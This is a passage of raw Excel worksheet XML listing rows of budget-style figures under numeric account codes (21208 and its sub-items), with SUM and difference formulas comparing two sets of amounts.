      <c r="S1377" s="12">
        <v>29815</v>
      </c>
      <c r="T1377" s="12">
        <v>1514</v>
      </c>
      <c r="U1377" s="12">
        <v>0</v>
      </c>
      <c r="V1377" s="12">
        <v>0</v>
      </c>
      <c r="W1377" s="12">
        <v>327</v>
      </c>
      <c r="X1377" s="12">
        <v>0</v>
      </c>
      <c r="Y1377" s="12">
        <v>0</v>
      </c>
      <c r="Z1377" s="12">
        <v>0</v>
      </c>
      <c r="AA1377" s="12">
        <v>75</v>
      </c>
      <c r="AB1377" s="12">
        <v>0</v>
      </c>
      <c r="AC1377" s="12">
        <v>0</v>
      </c>
      <c r="AD1377" s="12">
        <v>0</v>
      </c>
      <c r="AE1377" s="12">
        <f t="shared" ref="AE1377:AP1377" si="668">AE1378+AE1391+AE1395+AE1396+AE1402+AE1406+AE1410+AE1414+AE1420+AE1423</f>
        <v>-1831</v>
      </c>
      <c r="AF1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AG1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AH1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AI1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AJ1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AK1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AL1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AM1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AN1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AO1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
      <c r="AP1377" s="12">
        <f t="shared" si="668"/>
        <v>0</v>
      </c>
    </row>
    <row r="1378" ht="18" customHeight="1" spans="1:42">
      <c r="A1378" s="10"/>
      <c r="B1378" s="10"/>
      <c r="C1378" s="34"/>
      <c r="D1378" s="10">
        <v>21208</v>
      </c>
      <c r="E1378" s="11" t="s">
        <v>761</v>
      </c>
      <c r="F1378" s="14">
        <f t="shared" si="644"/>
        <v>402</v>
      </c>
      <c r="G1378" s="12">
        <f t="shared" ref="G1378:R1378" si="669">SUM(G1379:G1390)</f>
        <v>27984</v>
      </c>
      <c r="H1378" s="12">
        <f t="shared" si="669"/>
        <v>1514</v>
      </c>
      <c r="I1378" s="12">
        <f t="shared" si="669"/>
        <v>0</v>
      </c>
      <c r="J1378" s="12">
        <f t="shared" si="669"/>
        <v>0</v>
      </c>
      <c r="K1378" s="12">
        <f t="shared" si="669"/>
        <v>327</v>
      </c>
      <c r="L1378" s="12">
        <f t="shared" si="669"/>
        <v>0</v>
      </c>
      <c r="M1378" s="12">
        <f t="shared" si="669"/>
        <v>0</v>
      </c>
      <c r="N1378" s="12">
        <f t="shared" si="669"/>
        <v>0</v>
      </c>
      <c r="O1378" s="12">
        <f t="shared" si="669"/>
        <v>75</v>
      </c>
      <c r="P1378" s="12">
        <f t="shared" si="669"/>
        <v>0</v>
      </c>
      <c r="Q1378" s="12">
        <f t="shared" si="669"/>
        <v>0</v>
      </c>
      <c r="R1378" s="12">
        <f t="shared" si="669"/>
        <v>0</v>
      </c>
      <c r="S1378" s="12">
        <v>29815</v>
      </c>
      <c r="T1378" s="12">
        <v>1514</v>
      </c>
      <c r="U1378" s="12">
        <v>0</v>
      </c>
      <c r="V1378" s="12">
        <v>0</v>
      </c>
      <c r="W1378" s="12">
        <v>327</v>
      </c>
      <c r="X1378" s="12">
        <v>0</v>
      </c>
      <c r="Y1378" s="12">
        <v>0</v>
      </c>
      <c r="Z1378" s="12">
        <v>0</v>
      </c>
      <c r="AA1378" s="12">
        <v>75</v>
      </c>
      <c r="AB1378" s="12">
        <v>0</v>
      </c>
      <c r="AC1378" s="12">
        <v>0</v>
      </c>
      <c r="AD1378" s="12">
        <v>0</v>
      </c>
      <c r="AE1378" s="12">
        <f t="shared" ref="AE1378:AP1378" si="670">SUM(AE1379:AE1390)</f>
        <v>-1831</v>
      </c>
      <c r="AF1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AG1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AH1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AI1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AJ1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AK1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AL1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AM1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AN1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AO1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
      <c r="AP1378" s="12">
        <f t="shared" si="670"/>
        <v>0</v>
      </c>
    </row>
    <row r="1379" ht="18" customHeight="1" spans="1:42">
      <c r="A1379" s="10"/>
      <c r="B1379" s="10"/>
      <c r="C1379" s="34"/>
      <c r="D1379" s="10">
        <v>2120801</v>
      </c>
      <c r="E1379" s="16" t="s">
        <v>4066</v>
      </c>
      <c r="F1379" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1379" s="17">
        <v>743</v>
      </c>
      <c r="H1379" s="17">
        <v>1170</v>
      </c>
      <c r="I1379" s="17"/>
      <c r="J1379" s="17"/>
      <c r="K1379" s="17"/>
      <c r="L1379" s="17"/>
      <c r="M1379" s="17"/>
      <c r="N1379" s="17"/>
      <c r="O1379" s="17"/>
      <c r="P1379" s="17"/>
      <c r="Q1379" s="17"/>
      <c r="R1379" s="17"/>
      <c r="S1379" s="17">
        <v>2574</v>
      </c>
      <c r="T1379" s="62">
        <v>1170</v>
      </c>
      <c r="U1379" s="17"/>
      <c r="V1379" s="17"/>
      <c r="W1379" s="17"/>
      <c r="X1379" s="17"/>
      <c r="Y1379" s="17"/>
      <c r="Z1379" s="17"/>
      <c r="AA1379" s="17"/>
      <c r="AB1379" s="17"/>
      <c r="AC1379" s="17"/>
      <c r="AD1379" s="17"/>
      <c r="AE1379" s="17">
        <f t="shared" ref="AE1379:AP1390" si="671">G1379-S1379</f>
        <v>-1831</v>
      </c>
      <c r="AF1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1379" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1380" ht="18" customHeight="1" spans="1:42">
      <c r="A1380" s="10"/>
      <c r="B1380" s="10"/>
      <c r="C1380" s="34"/>
      <c r="D1380" s="10">
        <v>2120802</v>
      </c>
      <c r="E1380" s="16" t="s">
        <v>4067</v>
      </c>
      <c r="F1380" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1380" s="17"/>
      <c r="H1380" s="17"/>
      <c r="I1380" s="17"/>
      <c r="J1380" s="17"/>
      <c r="K1380" s="17"/>
      <c r="L1380" s="17"/>
      <c r="M1380" s="17"/>
      <c r="N1380" s="17"/>
      <c r="O1380" s="17"/>
      <c r="P1380" s="17"/>
      <c r="Q1380" s="17"/>
      <c r="R1380" s="17"/>
      <c r="S1380" s="17"/>
      <c r="T1380" s="17"/>
      <c r="U1380" s="17"/>
      <c r="V1380" s="17"/>
      <c r="W1380" s="17"/>
      <c r="X1380" s="17"/>
      <c r="Y1380" s="17"/>
      <c r="Z1380" s="17"/>
      <c r="AA1380" s="17"/>
      <c r="AB1380" s="17"/>
      <c r="AC1380" s="17"/>
      <c r="AD1380" s="17"/>
      <c r="AE1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1380" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1381" ht="18" customHeight="1" spans="1:42">
      <c r="A1381" s="10"/>
      <c r="B1381" s="10"/>
      <c r="C1381" s="34"/>
      <c r="D1381" s="10">
        <v>2120803</v>
      </c>
      <c r="E1381" s="16" t="s">
        <v>4068</v>
      </c>
      <c r="F1381" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1381" s="17"/>
      <c r="H1381" s="17"/>
      <c r="I1381" s="17"/>
      <c r="J1381" s="17"/>
      <c r="K1381" s="17"/>
      <c r="L1381" s="17"/>
      <c r="M1381" s="17"/>
      <c r="N1381" s="17"/>
      <c r="O1381" s="17"/>
      <c r="P1381" s="17"/>
      <c r="Q1381" s="17"/>
      <c r="R1381" s="17"/>
      <c r="S1381" s="17"/>
      <c r="T1381" s="17"/>
      <c r="U1381" s="17"/>
      <c r="V1381" s="17"/>
      <c r="W1381" s="17"/>
      <c r="X1381" s="17"/>
      <c r="Y1381" s="17"/>
      <c r="Z1381" s="17"/>
      <c r="AA1381" s="17"/>
      <c r="AB1381" s="17"/>
      <c r="AC1381" s="17"/>
      <c r="AD1381" s="17"/>
      <c r="AE1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1381" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1382" ht="18" customHeight="1" spans="1:42">
      <c r="A1382" s="10"/>
      <c r="B1382" s="10"/>
      <c r="C1382" s="34"/>
      <c r="D1382" s="10">
        <v>2120804</v>
      </c>
      <c r="E1382" s="16" t="s">
        <v>4069</v>
      </c>
      <c r="F1382" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1382" s="17"/>
      <c r="H1382" s="17">
        <v>244</v>
      </c>
      <c r="I1382" s="17"/>
      <c r="J1382" s="17"/>
      <c r="K1382" s="17"/>
      <c r="L1382" s="17"/>
      <c r="M1382" s="17"/>
      <c r="N1382" s="17"/>
      <c r="O1382" s="17"/>
      <c r="P1382" s="17"/>
      <c r="Q1382" s="17"/>
      <c r="R1382" s="17"/>
      <c r="S1382" s="17"/>
      <c r="T1382" s="17">
        <v>244</v>
      </c>
      <c r="U1382" s="17"/>
      <c r="V1382" s="17"/>
      <c r="W1382" s="17"/>
      <c r="X1382" s="17"/>
      <c r="Y1382" s="17"/>
      <c r="Z1382" s="17"/>
      <c r="AA1382" s="17"/>
      <c r="AB1382" s="17"/>
      <c r="AC1382" s="17"/>
      <c r="AD1382" s="17"/>
      <c r="AE1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1382" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1383" ht="18" customHeight="1" spans="1:42">
      <c r="A1383" s="10"/>
      <c r="B1383" s="10"/>
      <c r="C1383" s="34"/>
      <c r="D1383" s="10">
        <v>2120805</v>
      </c>
      <c r="E1383" s="16" t="s">
        <v>4070</v>
      </c>
      <c r="F1383" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1383" s="17"/>
      <c r="H1383" s="17"/>
      <c r="I1383" s="17"/>
      <c r="J1383" s="17"/>
      <c r="K1383" s="17"/>
      <c r="L1383" s="17"/>
      <c r="M1383" s="17"/>
      <c r="N1383" s="17"/>
      <c r="O1383" s="17"/>
      <c r="P1383" s="17"/>
      <c r="Q1383" s="17"/>
      <c r="R1383" s="17"/>
      <c r="S1383" s="17"/>
      <c r="T1383" s="17"/>
      <c r="U1383" s="17"/>
      <c r="V1383" s="17"/>
      <c r="W1383" s="17"/>
      <c r="X1383" s="17"/>
      <c r="Y1383" s="17"/>
      <c r="Z1383" s="17"/>
      <c r="AA1383" s="17"/>
      <c r="AB1383" s="17"/>
      <c r="AC1383" s="17"/>
      <c r="AD1383" s="17"/>
      <c r="AE1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1383" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1384" ht="18" customHeight="1" spans="1:42">
      <c r="A1384" s="10"/>
      <c r="B1384" s="10"/>
      <c r="C1384" s="34"/>
      <c r="D1384" s="10">
        <v>2120806</v>
      </c>
      <c r="E1384" s="16" t="s">
        <v>4071</v>
      </c>
      <c r="F1384" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1384" s="17"/>
      <c r="H1384" s="17"/>
      <c r="I1384" s="17"/>
      <c r="J1384" s="17"/>
      <c r="K1384" s="17"/>
      <c r="L1384" s="17"/>
      <c r="M1384" s="17"/>
      <c r="N1384" s="17"/>
      <c r="O1384" s="17"/>
      <c r="P1384" s="17"/>
      <c r="Q1384" s="17"/>
      <c r="R1384" s="17"/>
      <c r="S1384" s="17"/>
      <c r="T1384" s="17"/>
      <c r="U1384" s="17"/>
      <c r="V1384" s="17"/>
      <c r="W1384" s="17"/>
      <c r="X1384" s="17"/>
      <c r="Y1384" s="17"/>
      <c r="Z1384" s="17"/>
      <c r="AA1384" s="17"/>
      <c r="AB1384" s="17"/>
      <c r="AC1384" s="17"/>
      <c r="AD1384" s="17"/>
      <c r="AE1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1384" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1385" ht="18" customHeight="1" spans="1:42">
      <c r="A1385" s="10"/>
      <c r="B1385" s="10"/>
      <c r="C1385" s="34"/>
      <c r="D1385" s="10">
        <v>2120807</v>
      </c>
      <c r="E1385" s="16" t="s">
        <v>4072</v>
      </c>
      <c r="F1385" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1385" s="17"/>
      <c r="H1385" s="17"/>
      <c r="I1385" s="17"/>
      <c r="J1385" s="17"/>
      <c r="K1385" s="17"/>
      <c r="L1385" s="17"/>
      <c r="M1385" s="17"/>
      <c r="N1385" s="17"/>
      <c r="O1385" s="17"/>
      <c r="P1385" s="17"/>
      <c r="Q1385" s="17"/>
      <c r="R1385" s="17"/>
      <c r="S1385" s="17"/>
      <c r="T1385" s="17"/>
      <c r="U1385" s="17"/>
      <c r="V1385" s="17"/>
      <c r="W1385" s="17"/>
      <c r="X1385" s="17"/>
      <c r="Y1385" s="17"/>
      <c r="Z1385" s="17"/>
      <c r="AA1385" s="17"/>
      <c r="AB1385" s="17"/>
      <c r="AC1385" s="17"/>
      <c r="AD1385" s="17"/>
      <c r="AE1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1385" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1386" ht="18" customHeight="1" spans="1:42">
      <c r="A1386" s="10"/>
      <c r="B1386" s="10"/>
      <c r="C1386" s="34"/>
      <c r="D1386" s="10">
        <v>2120809</v>
      </c>
      <c r="E1386" s="16" t="s">
        <v>4073</v>
      </c>
      <c r="F1386" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1386" s="17"/>
      <c r="H1386" s="17"/>
      <c r="I1386" s="17"/>
      <c r="J1386" s="17"/>
      <c r="K1386" s="17"/>
      <c r="L1386" s="17"/>
      <c r="M1386" s="17"/>
      <c r="N1386" s="17"/>
      <c r="O1386" s="17"/>
      <c r="P1386" s="17"/>
      <c r="Q1386" s="17"/>
      <c r="R1386" s="17"/>
      <c r="S1386" s="17"/>
      <c r="T1386" s="17"/>
      <c r="U1386" s="17"/>
      <c r="V1386" s="17"/>
      <c r="W1386" s="17"/>
      <c r="X1386" s="17"/>
      <c r="Y1386" s="17"/>
      <c r="Z1386" s="17"/>
      <c r="AA1386" s="17"/>
      <c r="AB1386" s="17"/>
      <c r="AC1386" s="17"/>
      <c r="AD1386" s="17"/>
      <c r="AE1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1386" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1387" ht="18" customHeight="1" spans="1:42">
      <c r="A1387" s="10"/>
      <c r="B1387" s="10"/>
      <c r="C1387" s="34"/>
      <c r="D1387" s="10">
        <v>2120810</v>
      </c>
      <c r="E1387" s="16" t="s">
        <v>4074</v>
      </c>
      <c r="F1387" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1387" s="17">
        <v>26775</v>
      </c>
      <c r="H1387" s="17"/>
      <c r="I1387" s="17"/>
      <c r="J1387" s="17"/>
      <c r="K1387" s="17"/>
      <c r="L1387" s="17"/>
      <c r="M1387" s="17"/>
      <c r="N1387" s="17"/>
      <c r="O1387" s="17"/>
      <c r="P1387" s="17"/>
      <c r="Q1387" s="17"/>
      <c r="R1387" s="17"/>
      <c r="S1387" s="17">
        <v>26775</v>
      </c>
      <c r="T1387" s="17"/>
      <c r="U1387" s="17"/>
      <c r="V1387" s="17"/>
      <c r="W1387" s="17"/>
      <c r="X1387" s="17"/>
      <c r="Y1387" s="17"/>
      <c r="Z1387" s="17"/>
      <c r="AA1387" s="17"/>
      <c r="AB1387" s="17"/>
      <c r="AC1387" s="17"/>
      <c r="AD1387" s="17"/>
      <c r="AE1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1387" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1388" ht="18" customHeight="1" spans="1:42">
      <c r="A1388" s="10"/>
      <c r="B1388" s="10"/>
      <c r="C1388" s="34"/>
      <c r="D1388" s="10">
        <v>2120811</v>
      </c>
      <c r="E1388" s="16" t="s">
        <v>4075</v>
      </c>
      <c r="F1388" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1388" s="17"/>
      <c r="H1388" s="17"/>
      <c r="I1388" s="17"/>
      <c r="J1388" s="17"/>
      <c r="K1388" s="17"/>
      <c r="L1388" s="17"/>
      <c r="M1388" s="17"/>
      <c r="N1388" s="17"/>
      <c r="O1388" s="17"/>
      <c r="P1388" s="17"/>
      <c r="Q1388" s="17"/>
      <c r="R1388" s="17"/>
      <c r="S1388" s="17"/>
      <c r="T1388" s="17"/>
      <c r="U1388" s="17"/>
      <c r="V1388" s="17"/>
      <c r="W1388" s="17"/>
      <c r="X1388" s="17"/>
      <c r="Y1388" s="17"/>
      <c r="Z1388" s="17"/>
      <c r="AA1388" s="17"/>
      <c r="AB1388" s="17"/>
      <c r="AC1388" s="17"/>
      <c r="AD1388" s="17"/>
      <c r="AE1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1388" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1389" ht="18" customHeight="1" spans="1:42">
      <c r="A1389" s="10"/>
      <c r="B1389" s="10"/>
      <c r="C1389" s="34"/>
      <c r="D1389" s="10">
        <v>2120813</v>
      </c>
      <c r="E1389" s="16" t="s">
        <v>3926</v>
      </c>
      <c r="F1389" s="14">
        <f t="shared" si="644"/>
        <v>0</v>
      </c>
      <c r="G1389" s="17"/>
      <c r="H1389" s="17"/>
      <c r="I1389" s="17"/>
      <c r="J1389" s="17"/>
      <c r="K1389" s="17"/>
      <c r="L1389" s="17"/>
      <c r="M1389" s="17"/>
      <c r="N1389" s="17"/>
      <c r="O1389" s="17"/>
      <c r="P1389" s="17"/>
      <c r="Q1389" s="17"/>
      <c r="R1389" s="17"/>
      <c r="S1389" s="17"/>
      <c r="T1389" s="17"/>
      <c r="U1389" s="17"/>
      <c r="V1389" s="17"/>
      <c r="W1389" s="17"/>
      <c r="X1389" s="17"/>
      <c r="Y1389" s="17"/>
      <c r="Z1389" s="17"/>
      <c r="AA1389" s="17"/>
      <c r="AB1389" s="17"/>
      <c r="AC1389" s="17"/>
      <c r="AD1389" s="17"/>
      <c r="AE1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AF1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AG1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AH1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AI1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AJ1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AK1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AL1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AM1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AN1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AO1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
      <c r="AP1389" s="17">
        <f t="shared" si="671"/>
        <v>0</v>
      </c>
    </row>
    <row r="1390" ht="18" customHeight="1" spans="1:42">
      <c r="A1390" s="10"/>
      <c r="B1390" s="10"/>
      <c r="C1390" s="34"/>
      <c r="D1390" s="10">
        <v>2120899</v>
      </c>
      <c r="E1390" s="16" t="s">
